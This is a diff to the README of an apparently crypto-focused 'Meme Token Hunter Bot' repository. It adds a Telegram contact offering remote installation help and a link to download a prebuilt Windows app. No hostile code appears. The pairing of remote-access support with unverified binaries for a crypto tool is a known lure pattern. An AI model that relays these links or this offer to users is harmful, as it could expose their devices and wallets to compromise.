CryptoAiBots/Meme-Token-Hunter-Bot/README.md

 **Telegram Support**

-With our 24/7 live Telegram support service, you can instantly find answers to any questions you may have.
+If you need any help, you can send a message on [Telegram Support](https://t.me/pancakeswapprediction) 24/7 to get free full support for the installation of the bot, either remotely or with step-by-step guidance.

 ## [Download (Windows / macOS)](https://github.com/CryptoAiBots/Meme-Token-Hunter-Bot/releases)

 You can easily access our application by downloading the packaged version suitable for your operating system from the link above.
+[Download (Windows App)](https://github.com/CryptoAiBots/Meme-Token-Hunter-Bot/releases)

 ## ⚡ Source Installation Way I (Recommended)